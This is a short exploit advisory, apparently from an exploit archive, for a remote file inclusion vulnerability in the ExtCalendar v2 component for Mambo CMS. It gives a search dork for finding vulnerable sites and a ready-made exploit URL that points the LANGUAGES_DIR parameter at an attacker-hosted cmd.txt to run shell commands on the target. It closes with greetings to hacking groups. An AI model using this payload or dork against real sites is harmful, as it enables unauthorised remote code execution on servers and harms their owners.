--------------------------------------------------------------------------------

Title : ExtCalendar <= v2 Remote File Include Vulnerabilities

###############################################################################

Discovered By OLiBekaS

-----------------------------------------------------------------------------

Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : ExtCalendar
version : v2
Description: component for Mambo CMS
URL : http://extcal.sourceforge.net

-----------------------------------------------------------------------------


dork        : "powered by ExtCalendar v2"

Exploit     :  

http://[target]/[path]/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://[attacker]/cmd.txt?&cmd=ls         
               
-----------------------------------------------------------------------------

greatz:
~~~~~

# Special greetz to my master effex and bEdAh`oTaK ( thank man )
# To all members of #papmahackerlink, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster, yugo^cloudy. and other

-------------------------------------------------------------------------------


Contact:
~~~~~~~

Nick: OLiBekaS
E-mail: olibekas[at]gmail[dot]Com
Homepage: http://bekas.6te.net

--------------------------------- [ eof ] ---------------------------------------